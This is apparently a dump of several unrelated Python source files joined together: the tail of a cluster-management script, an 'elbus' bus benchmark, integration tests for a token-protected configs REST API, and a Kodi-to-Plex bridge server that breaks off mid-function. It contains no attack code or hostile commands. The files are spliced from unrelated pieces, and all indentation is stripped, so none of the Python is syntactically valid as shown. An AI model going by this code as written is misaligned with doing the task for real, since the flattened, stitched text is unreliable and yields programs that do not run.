logging.info('%s: %s' % (arg, value))
logging.info('------------------------------------------------')
if __name__ == "__main__":
print_arguments()
if args.action == "create":
logging.info("going to create cluster")
if not args.key_name or not args.security_group_id:
raise ValueError("key_name and security_group_id are required")
init_args()
create_cluster()
elif args.action == "cleanup":
logging.info("going to cleanup cluster")
if not args.task_name:
raise ValueError("task_name is required")
cleanup(args.task_name)
elif args.action == "serve":
# serve mode
if not args.master_server_ip:
raise ValueError(
"No master server ip set, please run with --action create")
logging.info("going to start serve and create cluster")
init_args()
logging.info("starting server in another thread")
server_thread = threading.Thread(target=start_server, args=(args, ))
server_thread.start()
create_cluster()
server_thread.join()
elif args.action == "test":
start_server(args)
|
test.py | import sys
sys.path.insert(0, '..')
import elbus
import threading
import time
import random
from tqdm import tqdm
iters = 100_000
workers = 1
cnt = 0
def on_frame(frame):
global cnt
cnt += 1
def test(w, iters):
try:
global cnt
payload = b'\x01' * 1024
name = f'test{random.randint(0,1000_000)}-{w}'
path = '/tmp/elbus.sock'
# path = 'localhost:9924'
bus = elbus.client.Client(path, name)
bus.on_frame = on_frame
bus.connect()
print(f'Connected to {path}')
for i in range(iters):
frame = elbus.client.Frame(payload, qos=3)
b = bus.send('y', frame)
if not b.wait_completed(timeout=1):
raise TimeoutError
cnt += 1
except Exception as e:
import traceback
traceback.print_exc()
started = time.perf_counter()
for w in range(workers):
threading.Thread(target=test, args=(w, int(iters / workers))).start()
time.sleep(0.1)
with tqdm(total=iters) as pbar:
prev = 0
while cnt < iters:
time.sleep(0.01)
pbar.update(cnt - prev)
prev = cnt
pbar.update(iters)
elapsed = time.perf_counter() - started
speed = round(iters / elapsed)
print(f'{round(1_000_000/speed)} us per iter')
|
configs.py | from multiprocessing import Process
import unittest
import requests
import uvicorn
import time
# local import
from ..IO import BASE_URL, URLs, INPUTS_CONFIGS, OUTPUTS_CONFIGS
from ..settings import create_users, create_configs
from app.main import app
class IntegrationTests_Configs(unittest.TestCase):
"""
Integration tests class using unittest (Configs endpoints)
"""
def __init__(self, *args, **kwargs):
"""
self.inputs: dict (standard tests inputs from input.py @tests dir)
self.outputs: dict (expected tests outputs)
self.urls: dict (base urls)
"""
super(IntegrationTests_Configs, self).__init__(*args, **kwargs)
self.inputs = INPUTS_CONFIGS()
self.outputs = OUTPUTS_CONFIGS()
self.urls = URLs(True)
@classmethod
def setUpClass(cls):
# check for tests users
create_users()
# create tests configs
create_configs()
# start the app
IntegrationTests_Configs.proc = Process(
target=cls.run_app, args=(), daemon=True
)
IntegrationTests_Configs.proc.start()
base_url = BASE_URL()
# wait the app
while True:
try:
req = requests.get(base_url + "/docs")
if req.status_code == 200:
break
except Exception as requestErr:
time.sleep(2.5)
@classmethod
def tearDownClass(cls):
# stop the app
IntegrationTests_Configs.proc.join(2.5)
@classmethod
def run_app(cls):
"""
run the app using uvicorn
"""
uvicorn.run(app=app, host="127.0.0.1", port=5057)
# [get_access_token : GET : /token]
def test_00_create_access_token_for_admin_and_user2(self):
res1 = requests.post(
self.urls["get_access_token"],
headers=self.inputs["test_00_create_access_token_for_admin_and_user2"][
"headers"
],
data=self.inputs["test_00_create_access_token_for_admin_and_user2"][
"admin"
],
)
res2 = requests.post(
self.urls["get_access_token"],
headers=self.inputs["test_00_create_access_token_for_admin_and_user2"][
"headers"
],
data=self.inputs["test_00_create_access_token_for_admin_and_user2"][
"user2"
],
)
assert (
res1.status_code
== self.outputs["test_00_create_access_token_for_admin_and_user2"][
"status_code"
]
)
assert (
res2.status_code
== self.outputs["test_00_create_access_token_for_admin_and_user2"][
"status_code"
]
)
IntegrationTests_Configs.admin_token = res1.json()["access_token"]
IntegrationTests_Configs.user2_token = res2.json()["access_token"]
# [List : GET : /configs]
def test_01_List_success(self):
self.inputs["test_01_List_success"]["headers"]["Authorization"] = (
self.inputs["test_01_List_success"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
self.urls["List"], headers=self.inputs["test_01_List_success"]["headers"]
)
assert res.status_code == self.outputs["test_01_List_success"]["status_code"]
assert res.json() == self.outputs["test_01_List_success"]["json"]
# [List : GET : /configs]
def test_02_List_success_owner(self):
self.inputs["test_02_List_success_owner"]["headers"]["Authorization"] = (
self.inputs["test_02_List_success_owner"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
self.urls["List"]
+ "?owner="
+ self.inputs["test_02_List_success_owner"]["owner"],
headers=self.inputs["test_02_List_success_owner"]["headers"],
)
assert (
res.status_code == self.outputs["test_02_List_success_owner"]["status_code"]
)
assert res.json() == self.outputs["test_02_List_success_owner"]["json"]
# [List : GET : /configs]
def test_03_List_401(self):
self.inputs["test_03_List_401"]["headers"]["Authorization"] = (
self.inputs["test_03_List_401"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.get(
self.urls["List"] + "?owner=" + self.inputs["test_03_List_401"]["owner"],
headers=self.inputs["test_03_List_401"]["headers"],
)
assert res.status_code == self.outputs["test_03_List_401"]["status_code"]
assert res.json() == self.outputs["test_03_List_401"]["json"]
# [Create : POST : /configs]
def test_04_Create_success(self):
self.inputs["test_04_Create_success"]["headers"]["Authorization"] = (
self.inputs["test_04_Create_success"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.post(
self.urls["Create"],
headers=self.inputs["test_04_Create_success"]["headers"],
json=self.inputs["test_04_Create_success"]["json"],
)
assert res.status_code == self.outputs["test_04_Create_success"]["status_code"]
assert res.json() == self.outputs["test_04_Create_success"]["json"]
# [Create : POST : /configs]
def test_05_Create_400(self):
self.inputs["test_05_Create_400"]["headers"]["Authorization"] = (
self.inputs["test_05_Create_400"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.post(
self.urls["Create"],
headers=self.inputs["test_05_Create_400"]["headers"],
json=self.inputs["test_05_Create_400"]["json"],
)
assert res.status_code == self.outputs["test_05_Create_400"]["status_code"]
assert res.json() == self.outputs["test_05_Create_400"]["json"]
# [Get : GET : /configs/{name}]
def test_06_Get_success(self):
self.inputs["test_06_Get_success"]["headers"]["Authorization"] = (
self.inputs["test_06_Get_success"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
(self.urls["Get"] % self.inputs["test_06_Get_success"]["name"]),
headers=self.inputs["test_06_Get_success"]["headers"],
)
assert res.status_code == self.outputs["test_06_Get_success"]["status_code"]
assert res.json() == self.outputs["test_06_Get_success"]["json"]
# [Get : GET : /configs/{name}]
def test_07_Get_success_owner(self):
self.inputs["test_07_Get_success_owner"]["headers"]["Authorization"] = (
self.inputs["test_07_Get_success_owner"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
(
self.urls["Get"] % (self.inputs["test_07_Get_success_owner"]["name"])
+ "?owner="
+ self.inputs["test_07_Get_success_owner"]["owner"]
),
headers=self.inputs["test_07_Get_success_owner"]["headers"],
)
assert (
res.status_code == self.outputs["test_07_Get_success_owner"]["status_code"]
)
assert res.json() == self.outputs["test_07_Get_success_owner"]["json"]
# [Get : GET : /configs/{name}]
def test_08_Get_401(self):
self.inputs["test_08_Get_401"]["headers"]["Authorization"] = (
self.inputs["test_08_Get_401"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.get(
(
self.urls["Get"] % (self.inputs["test_08_Get_401"]["name"])
+ "?owner="
+ self.inputs["test_07_Get_success_owner"]["owner"]
),
headers=self.inputs["test_08_Get_401"]["headers"],
)
assert res.status_code == self.outputs["test_08_Get_401"]["status_code"]
assert res.json() == self.outputs["test_08_Get_401"]["json"]
# [Get : GET : /configs/{name}]
def test_09_Get_404(self):
self.inputs["test_09_Get_404"]["headers"]["Authorization"] = (
self.inputs["test_09_Get_404"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
(
self.urls["Get"] % (self.inputs["test_09_Get_404"]["name"])
+ "?owner="
+ self.inputs["test_07_Get_success_owner"]["owner"]
),
headers=self.inputs["test_09_Get_404"]["headers"],
)
assert res.status_code == self.outputs["test_09_Get_404"]["status_code"]
assert res.json() == self.outputs["test_09_Get_404"]["json"]
# [Update : PUT : /configs/{name}]
def test_10_Update_success(self):
self.inputs["test_10_Update_success"]["headers"]["Authorization"] = (
self.inputs["test_10_Update_success"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.put(
(self.urls["Update"] % self.inputs["test_10_Update_success"]["name"]),
headers=self.inputs["test_10_Update_success"]["headers"],
json=self.inputs["test_10_Update_success"]["json"],
)
assert res.status_code == self.outputs["test_10_Update_success"]["status_code"]
assert res.json() == self.outputs["test_10_Update_success"]["json"]
# [Update : PUT : /configs/{name}]
def test_11_Update_success_owner(self):
self.inputs["test_11_Update_success_owner"]["headers"]["Authorization"] = (
self.inputs["test_11_Update_success_owner"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.put(
(self.urls["Update"] % self.inputs["test_11_Update_success_owner"]["name"])
+ "?owner="
+ self.inputs["test_11_Update_success_owner"]["owner"],
headers=self.inputs["test_11_Update_success_owner"]["headers"],
json=self.inputs["test_11_Update_success_owner"]["json"],
)
assert (
res.status_code
== self.outputs["test_11_Update_success_owner"]["status_code"]
)
assert res.json() == self.outputs["test_11_Update_success_owner"]["json"]
# [Update : PUT : /configs/{name}]
def test_12_Update_401(self):
self.inputs["test_12_Update_401"]["headers"]["Authorization"] = (
self.inputs["test_12_Update_401"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.put(
(
self.urls["Update"] % (self.inputs["test_12_Update_401"]["name"])
+ "?owner="
+ self.inputs["test_12_Update_401"]["owner"]
),
headers=self.inputs["test_12_Update_401"]["headers"],
json=self.inputs["test_12_Update_401"]["json"],
)
assert res.status_code == self.outputs["test_12_Update_401"]["status_code"]
assert res.json() == self.outputs["test_12_Update_401"]["json"]
# [Update : PUT : /configs/{name}]
def test_13_Update_404(self):
self.inputs["test_13_Update_404"]["headers"]["Authorization"] = (
self.inputs["test_13_Update_404"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.put(
(
self.urls["Update"] % (self.inputs["test_13_Update_404"]["name"])
+ "?owner="
+ self.inputs["test_13_Update_404"]["owner"]
),
headers=self.inputs["test_13_Update_404"]["headers"],
json=self.inputs["test_13_Update_404"]["json"],
)
assert res.status_code == self.outputs["test_13_Update_404"]["status_code"]
assert res.json() == self.outputs["test_13_Update_404"]["json"]
# [Delete : Delete : /configs/{name}]
def test_14_Delete_success(self):
self.inputs["test_14_Delete_success"]["headers"]["Authorization"] = (
self.inputs["test_14_Delete_success"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.delete(
(self.urls["Delete"] % self.inputs["test_14_Delete_success"]["name"]),
headers=self.inputs["test_14_Delete_success"]["headers"],
)
assert res.status_code == self.outputs["test_14_Delete_success"]["status_code"]
assert res.json() == self.outputs["test_14_Delete_success"]["json"]
# [Delete : Delete : /configs/{name}]
def test_15_Delete_success_owner(self):
self.inputs["test_15_Delete_success_owner"]["headers"]["Authorization"] = (
self.inputs["test_15_Delete_success_owner"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.delete(
(self.urls["Delete"] % self.inputs["test_15_Delete_success_owner"]["name"])
+ "?owner="
+ self.inputs["test_15_Delete_success_owner"]["owner"],
headers=self.inputs["test_15_Delete_success_owner"]["headers"],
)
assert (
res.status_code
== self.outputs["test_15_Delete_success_owner"]["status_code"]
)
assert res.json() == self.outputs["test_15_Delete_success_owner"]["json"]
# [Delete : Delete : /configs/{name}]
def test_16_Delete_401(self):
self.inputs["test_16_Delete_401"]["headers"]["Authorization"] = (
self.inputs["test_16_Delete_401"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.delete(
(
self.urls["Delete"] % (self.inputs["test_16_Delete_401"]["name"])
+ "?owner="
+ self.inputs["test_16_Delete_401"]["owner"]
),
headers=self.inputs["test_16_Delete_401"]["headers"],
)
assert res.status_code == self.outputs["test_16_Delete_401"]["status_code"]
assert res.json() == self.outputs["test_16_Delete_401"]["json"]
# [Delete : Delete : /configs/{name}]
def test_17_Delete_404(self):
self.inputs["test_17_Delete_404"]["headers"]["Authorization"] = (
self.inputs["test_17_Delete_404"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.delete(
(
self.urls["Delete"] % (self.inputs["test_17_Delete_404"]["name"])
+ "?owner="
+ self.inputs["test_17_Delete_404"]["owner"]
),
headers=self.inputs["test_17_Delete_404"]["headers"],
)
assert res.status_code == self.outputs["test_17_Delete_404"]["status_code"]
assert res.json() == self.outputs["test_17_Delete_404"]["json"]
# [Query : GET : /search/metadata.{key}={value}]
def test_18_Query_success(self):
self.inputs["test_18_Query_success"]["headers"]["Authorization"] = (
self.inputs["test_18_Query_success"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
(
self.urls["Query"]
% (
self.inputs["test_18_Query_success"]["key"],
self.inputs["test_18_Query_success"]["value"],
)
+ "?all="
+ self.inputs["test_18_Query_success"]["all"]
),
headers=self.inputs["test_18_Query_success"]["headers"],
)
assert res.status_code == self.outputs["test_18_Query_success"]["status_code"]
assert res.json() == self.outputs["test_18_Query_success"]["json"]
# [Query : GET : /search/metadata.{key}={value}]
def test_19_Query_success_all(self):
self.inputs["test_19_Query_success_all"]["headers"]["Authorization"] = (
self.inputs["test_19_Query_success_all"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
(
self.urls["Query"]
% (
self.inputs["test_19_Query_success_all"]["key"],
self.inputs["test_19_Query_success_all"]["value"],
)
+ "?all="
+ self.inputs["test_19_Query_success_all"]["all"]
),
headers=self.inputs["test_19_Query_success_all"]["headers"],
)
assert (
res.status_code == self.outputs["test_19_Query_success_all"]["status_code"]
)
assert res.json() == self.outputs["test_19_Query_success_all"]["json"]
# [Query : GET : /search/metadata.{key}={value}]
def test_20_Query_success_owner(self):
self.inputs["test_20_Query_success_owner"]["headers"]["Authorization"] = (
self.inputs["test_20_Query_success_owner"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
(
self.urls["Query"]
% (
self.inputs["test_20_Query_success_owner"]["key"],
self.inputs["test_20_Query_success_owner"]["value"],
)
)
+ "?all="
+ self.inputs["test_20_Query_success_owner"]["all"]
+ "&owner="
+ self.inputs["test_20_Query_success_owner"]["owner"],
headers=self.inputs["test_20_Query_success_owner"]["headers"],
)
assert (
res.status_code
== self.outputs["test_20_Query_success_owner"]["status_code"]
)
assert res.json() == self.outputs["test_20_Query_success_owner"]["json"]
# [Query : GET : /search/metadata.{key}={value}]
def test_21_Query_401(self):
self.inputs["test_21_Query_401"]["headers"]["Authorization"] = (
self.inputs["test_21_Query_401"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.get(
(
self.urls["Query"]
% (
self.inputs["test_21_Query_401"]["key"],
self.inputs["test_21_Query_401"]["value"],
)
+ "?all="
+ self.inputs["test_21_Query_401"]["all"]
),
headers=self.inputs["test_21_Query_401"]["headers"],
)
assert res.status_code == self.outputs["test_21_Query_401"]["status_code"]
assert res.json() == self.outputs["test_21_Query_401"]["json"]
|
kodi2plex.py | """
Kodi2Plex
Simple server to access a Kodi instance from Plex clients
"""
import os
import sys
import json
import time
import struct
import socket
import pprint
import random
import logging
import asyncio
import argparse
import threading
import traceback
import collections
import http.server
import socketserver
import urllib.request
import xml.dom.minidom
import xml.etree.ElementTree
import aiohttp
import aiohttp.web
video_codec_map = {"avc1": "h264", "hev1": "hevc", "hevc": "hevc"}
def _xml_prettify(elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = xml.etree.ElementTree.tostring(elem)
reparsed = xml.dom.minidom.parseString(rough_string)
return reparsed.toprettyxml(indent=" ")
async def kodi_request(app, method, params):
"""
Sends a JSON formatted message to the server
returns the result as dictionary (from json response)
"""
# create the request
payload = {
"method": method,
"params": params,
"jsonrpc": "2.0",
"id": app["kodi_jsonrpc_counter"],
}
# increase the message counter
app["kodi_jsonrpc_counter"] += 1
if app["debug"]:
logger.debug("Sending to %s\nDATA:\n%s", app["kodi_url"], pprint.pformat(payload))
# fire up the request
kodi_response = await app["client_session"].post(app["kodi_url"],
data=json.dumps(payload).encode("utf8"),
headers={'content-type': 'application/json'})
kodi_json = await kodi_response.json()
if app["debug"]:
logger.debug("Result:\n%s", pprint.pformat(kodi_json))
return kodi_json
async def init_kodi(app):
pass
# json_data = await app["client_session"].get(app["kodi_url"])
# json_data = await json_data.json()
# # json_data["methods"] = []
# # json_data["notifications"] = []
# # json_data["types"] = []
# pprint.pprint(json_data["methods"]["VideoLibrary.GetEpisodes"])
# pprint.pprint(json_data["types"]["List.Sort"])
def gdm_broadcast(gdm_socket, kodi2plex_app):
"""
Function to send response for GDM requests from
Plex clients
"""
while gdm_socket.fileno() != -1:
logger.debug('GDM: waiting to recieve')
data, address = gdm_socket.recvfrom(1024)
logger.debug('received %s bytes from %s', len(data), address)
# discard message if header is not in right format
if data == b'M-SEARCH * HTTP/1.1\r\n\r\n':
mxpos = data.find(b'MX:')
maxdelay = int(data[mxpos+4]) % 5 # Max value of this field is 5
time.sleep(random.randrange(0, maxdelay+1, 1)) # wait for random 0-MX time until sending out responses using unicast.
logger.info('Sending M Search response to - %s', address)
# response as string
response_message = """HTTP/1.1 200 OK\r
Content-Type: plex/media-server\r
Name: %s\r
Port: 32400\r
Resource-Identifier: 23f2d6867befb9c26f7b5f366d4dd84e9b2294c9\r
Updated-At: 1466340239\r
Version: 0.9.16.6.1993-5089475\r
\r\n""" % kodi2plex_app["server_ip"]
logger.debug("GDM send: %s", response_message)
gdm_socket.sendto(response_message.encode("utf8"), address)
else:
logger.warn('recieved wrong MSearch')
time.sleep(5)
def IndexMiddleware(index='index.html'):
"""Middleware to serve index files (e.g. index.html) when static directories are requested.
Usage:
::
from aiohttp import web
from aiohttp_index import IndexMiddleware
app = web.Application(middlewares=[IndexMiddleware()])
app.router.add_static('/', 'static')
``app`` will now serve ``static/index.html`` when ``/`` is requested.
:param str index: The name of a directory's index file.
:returns: The middleware factory.
:rtype: function
"""
async def middleware_factory(app, handler):
"""Middleware factory method.
:type app: aiohttp.web.Application
:type handler: function
:returns: The retry handler.
:rtype: function
"""
async def index_handler(request):
"""Handler to serve index files (index.html) for static directories.
:type request: aiohttp.web.Request
:returns: The result of the next handler in the chain.
:rtype: aiohttp.web.Response
"""
try:
filename = request.match_info['filename']
if not filename:
filename = index
if filename.endswith('/'):
filename += index
request.match_info['filename'] = filename
except KeyError:
pass
return await handler(request)
return index_handler
return middleware_factory
async def extract_kodi_info(app, video_node, kodi_info, stream_id):
part_node = None
try:
video_codec = kodi_info["streamdetails"]["video"][0]["codec"]
media_node = xml.etree.ElementTree.Element("Media",
attrib={"duration": str(kodi_info["runtime"] * 1000),
"width": str(kodi_info["streamdetails"]["video"][0]["width"]),
"height": str(kodi_info["streamdetails"]["video"][0]["height"]),
"aspectRatio": str(kodi_info["streamdetails"]["video"][0]["aspect"]),
"audioChannels": str(kodi_info["streamdetails"]["audio"][0]["channels"]),
"container": "mp4",
"optimizedForStreaming": "1",
"audioCodec": kodi_info["streamdetails"]["audio"][0]["codec"],
"videoCodec": video_codec_map.get(video_codec, video_codec)})
video_node.append(media_node)
download_info = await kodi_request(app, "Files.PrepareDownload", [kodi_info["file"]])
download_url = app["kodi"] + download_info['result']['details']['path']
part_node = xml.etree.ElementTree.Element("Part",
attrib={"accessible": "1",
"id": stream_id,
"container": "mp4",
"optimizedForStreaming": "1",
"key": download_url})
media_node.append(part_node)
except:
logger.error("Error while getting stream details for error: %s", traceback.format_exc())
if part_node != None:
stream_counter = 1
default_node = True
for video in kodi_info["streamdetails"]["video"]:
stream_node = xml.etree.ElementTree.Element("Stream", attrib={"streamType": "1",
"id": str(stream_counter),
"codec": video_codec_map[video["codec"]],
"codecID": video_codec_map[video["codec"]],
"duration": str(video["duration"] * 1000),
"width": str(video["width"]),
"height": str(video["height"]),
"streamIdentifier": str(stream_counter + 1),
"index": str(stream_counter)})
if default_node:
stream_node.attrib["default"] = "1"
default_node = False
part_node.append(stream_node)
stream_counter += 1
default_node = True
for audio in kodi_info["streamdetails"]["audio"]:
stream_node = xml.etree.ElementTree.Element("Stream", attrib={"streamType": "2",
"id": str(stream_counter),
"codec": audio["codec"],
"language": audio["language"],
"languageCode": audio["language"],
"channels": str(audio["channels"]),
"streamIdentifier": str(stream_counter + 1),
"index": str(stream_counter)})
if default_node:
stream_node.attrib["default"] = "1"
default_node = False
part_node.append(stream_node)
stream_counter += 1
for director in kodi_info["director"]:
director_node = xml.etree.ElementTree.Element("Director", attrib={"tag": director})
video_node.append(director_node)
if "genre" in kodi_info:
for genre in kodi_info["genre"]:
genre_node = xml.etree.ElementTree.Element("Genre", attrib={"tag": genre})
video_node.append(genre_node)
for writer in kodi_info["writer"]:
writer_node = xml.etree.ElementTree.Element("Writer", attrib={"tag": writer})
video_node.append(writer_node)
if "genre" in kodi_info:
for country in kodi_info["country"]:
country_node = xml.etree.ElementTree.Element("Country", attrib={"tag": country})
video_node.append(country_node)
for cast in kodi_info["cast"]:
cast_node = xml.etree.ElementTree.Element("Role", attrib={"tag": cast["name"],
"role": cast["role"]})
video_node.append(cast_node)
async def get_movie_node(app, movie_id):
movie_info = await kodi_request(app,
"VideoLibrary.GetMovieDetails",
{"movieid": movie_id,
"properties": ["title",
"genre",
"year",
"rating",
"director",
"trailer",
"tagline",
"plot",
"plotoutline",
"originaltitle",
"lastplayed",
"playcount",
"writer",
"studio",
"mpaa",
"cast",
"country",
"imdbnumber",
"runtime",
"set",
"showlink",
"streamdetails",
"top250",
"votes",
"fanart",
"thumbnail",
"file",
"sorttitle",
"resume",
"setid",
"dateadded",
"tag",
"art"]})
movie_info = movie_info["result"]["moviedetails"]
video_node = xml.etree.ElementTree.Element("Video",
attrib={"type": "movie",
"key": "/library/metadata/movie/%d" % movie_id,
"title": movie_info['label'],
"studio": "" if not movie_info['studio'] else movie_info['studio'][0],
"tagline": movie_info['tagline'],
"summary": movie_info['plot'],
"year": str(movie_info['year']),
"rating": str(movie_info["rating"]),
"art": movie_info["fanart"],
"viewCount": str(movie_info['playcount']),
"viewOffset": str(int(movie_info["resume"]["position"]*1000)),
"duration": str(movie_info["runtime"] * 1000),
"thumb": movie_info['thumbnail']})
await extract_kodi_info(app, video_node, movie_info, str(movie_id))
return video_node
async def get_episode_node(app, episode_id):
episode_info = await kodi_request(app,
"VideoLibrary.GetEpisodeDetails",
[episode_id,
["title", "plot", "votes", "rating", "writer", "firstaired", "playcount",
"runtime", "director", "productioncode", "season", "episode", "originaltitle",
"showtitle", "cast", "streamdetails", "lastplayed", "fanart", "thumbnail", "file",
"resume", "tvshowid", "dateadded", "uniqueid", "art"]])
episode_info = episode_info["result"]["episodedetails"]
video_node = xml.etree.ElementTree.Element("Video",
attrib={"type": "episode",
"key": "/library/metadata/episode/%d" % episode_id,
"title": episode_info['label'],
"summary": episode_info['plot'],
"rating": str(episode_info["rating"]),
"art": episode_info["fanart"],
"duration": str(episode_info["runtime"] * 1000),
"viewCount": str(episode_info['playcount']),
"viewOffset": str(int(episode_info["resume"]["position"]*1000)),
"thumb": episode_info['thumbnail']})
await extract_kodi_info(app, video_node, episode_info, "episode%d" % episode_id)
return video_node
async def get_root(request):
root = xml.etree.ElementTree.Element("MediaContainer", attrib={})
root.attrib["allowMediaDeletion"] = "1"
root.attrib["friendlyName"] = "Kodi2Plex"
root.attrib["machineIdentifier"] = "23f2d6867befb9c26f7b5f366d4dd84e9b2294c9"
root.attrib["myPlex"] = "0"
root.attrib["myPlexMappingState"] = "unknown"
root.attrib["myPlexSigninState"] = "none"
root.attrib["myPlexSubscription"] = "0"
root.attrib["myPlexUsername"] = ""
root.attrib["platform"] = "Linux"
root.attrib["platformVersion"] = " (#3 SMP PREEMPT Wed Nov 19 08:28:34 CET 2014)"
root.attrib["requestParametersInCookie"] = "0"
root.attrib["sync"] = "1"
root.attrib["transcoderActiveVideoSessions"] = "0"
root.attrib["transcoderAudio"] = "1"
root.attrib["transcoderVideo"] = "1"
root.attrib["transcoderVideoBitrates"] = "64,96,208,320,720,1500,2000,3000,4000,8000,10000,12000,20000"
root.attrib["transcoderVideoQualities"] = "0,1,2,3,4,5,6,7,8,9,10,11,12"
root.attrib["transcoderVideoRemuxOnly"] = "1"
root.attrib["transcoderVideoResolutions"] = "128,128,160,240,320,480,768,720,720,1080,1080,1080,1080"
root.attrib["updatedAt"] = "1466340239"
root.attrib["version"] = "0.9.16.6.1993-5089475"
for index, option in enumerate(["channels", "clients", "hubs", "library", "music", "neighborhood",
"playQueues", "player", "playlists", "resources", "search", "server", "servers",
"statistics", "system", "transcode", "updater", "video"]):
root.append(xml.etree.ElementTree.Element("Directory", attrib={"count": "1", "key": option, "title": option}))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_sections(request):
video_playlists = await kodi_request(request.app,
"Files.GetDirectory",
["special://videoplaylists/",
"video",
["file"],
{"method": "label",
"order": "ascending"}])
video_playlists = video_playlists["result"]["files"]
video_playlists_count = len(video_playlists)
result = """<MediaContainer size="%d" allowSync="0" identifier="com.plexapp.plugins.library" mediaTagPrefix="/system/bundle/media/flags/"\
mediaTagVersion="1420847353" title1="Plex Library">""" % (video_playlists_count + 1)
# All Movies
result += """<Directory allowSync="0" art="/:/resources/movie-fanart.jpg" filters="1" refreshing="0" thumb="/:/resources/movie.png"\
key="0" type="movie" title="All Movies" composite="/library/sections/6/composite/1423495904" agent="com.plexapp.agents.themoviedb"\
scanner="Plex Movie Scanner" updatedAt="1423495904" createdAt="1413134298" />"""
# All TV Shows
result += """<Directory key="1" type="show" title="All TV Shows" filters="1" />"""
request.app["playlists"] = video_playlists
for index, video_playlist in enumerate(video_playlists):
pprint.pprint(video_playlist)
result += """<Directory filters="1" key="%d" type="movie" title="%s" />""" \
% (index + 2, video_playlist["label"])
result += "</MediaContainer>"
if request.app["debug"]:
logger.debug(result)
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + result.encode("utf8"))
async def get_all_movies(request, result_field_name, method):
root = xml.etree.ElementTree.Element("MediaContainer", attrib={"identifier": "com.plexapp.plugins.library",
"viewGroup": "movie"})
option = request.match_info["option"]
logger.debug("Get all movies with open %s", option)
if 'all' == option:
start_item = int(request.GET["X-Plex-Container-Start"])
end_item = start_item + int(request.GET["X-Plex-Container-Size"])
logger.debug("Requested all Movies from %d to %d", start_item, end_item)
all_movies = await method
root.attrib["totalSize"] = str(all_movies["result"]["limits"]["total"])
if start_item != end_item:
for movie in all_movies["result"][result_field_name]:
if "movieid" in movie:
movie_id = str(movie.get("movieid"))
else:
movie_id = str(movie["id"])
root.append(xml.etree.ElementTree.Element("Video",
attrib={"id": movie_id,
"type": "movie",
"title": movie['label'],
"rating": str(movie['rating']),
"summary": movie['plot'],
"year": str(movie['year']),
"thumb": movie['thumbnail'],
"key": "/library/metadata/movie/%s" % movie_id}))
elif "firstCharacter" == option:
all_movies = await method
character_dict = collections.defaultdict(int)
for movie in all_movies["result"][result_field_name]:
first_character = movie['label'].upper()[0]
if first_character.isalpha():
character_dict[first_character] += 1
else:
character_dict['#'] += 1
for character in sorted(character_dict.keys()):
root.append(xml.etree.ElementTree.Element("Directory", attrib={"size": str(character_dict[character]),
"key": character,
"title": character}))
elif "sorts" == option:
sort_dict = {"Date Added": "dateadded",
"Date Viewed": "lastplayed",
"Year": "year",
"Name": "label",
"Rating": "rating"}
for sort_name, sort_key in sort_dict.items():
root.append(xml.etree.ElementTree.Element("Directory", attrib={"defaultDirection": "desc",
"descKey": "%s:desc" % sort_key,
"key": sort_key,
"title": sort_name}))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_all_tvshows(request):
root = xml.etree.ElementTree.Element("MediaContainer", attrib={"identifier": "com.plexapp.plugins.library",
"viewGroup": "show"})
option = request.match_info["option"]
logger.debug("Get all tv shows with open %s", option)
if 'all' == option:
start_item = int(request.GET["X-Plex-Container-Start"])
end_item = start_item + int(request.GET["X-Plex-Container-Size"])
view_type = int(request.GET.get("type", 2))
sort_type, sort_direction = request.GET.get("sort", "label:asc").split(":")
# on Android we sometimes get this sort as default, so we change it
if "titleSort" == sort_type:
sort_type = "label"
sort_direction = "ascending" if sort_direction == "asc" else "descending"
logger.debug("Requested all TV shows from %d to %d, sort by %s direction %s", start_item, end_item, sort_type, sort_direction)
all_tv_shows = await kodi_request(request.app,
"VideoLibrary.GetTVShows",
{"properties": ["art", "rating", "thumbnail", "playcount", "file", "plot", "watchedepisodes",
"episode", "season"],
"sort": {"order": sort_direction, "method": sort_type}})
if start_item == 0 and end_item == 0:
# workaround for bug in KODI where the result from limits
# can't be trusted
request.app["kodi_tvshow_total"] = len(all_tv_shows["result"]["tvshows"])
root.attrib["totalSize"] = str(request.app.get("kodi_tvshow_total", len(all_tv_shows["result"]["tvshows"])))
if start_item != end_item:
for tv_show in all_tv_shows["result"]["tvshows"][start_item:end_item]:
root.append(xml.etree.ElementTree.Element("Video",
attrib={"type": "show",
"title": tv_show['label'],
"summary": tv_show['plot'],
"thumb": tv_show['thumbnail'],
"leafCount": str(tv_show['episode']),
"viewedLeafCount": str(tv_show['watchedepisodes']),
"childCount": str(tv_show['season']),
"key": "/library/metadata/tvshow/%d/children" % tv_show["tvshowid"]}))
elif "firstCharacter" == option:
all_movies = await kodi_request(request.app, "VideoLibrary.GetTVShows", {})
character_dict = collections.defaultdict(int)
for movie in all_movies["result"]["tvshows"]:
first_character = movie['label'].upper()[0]
if first_character.isalpha():
character_dict[first_character] += 1
else:
character_dict['#'] += 1
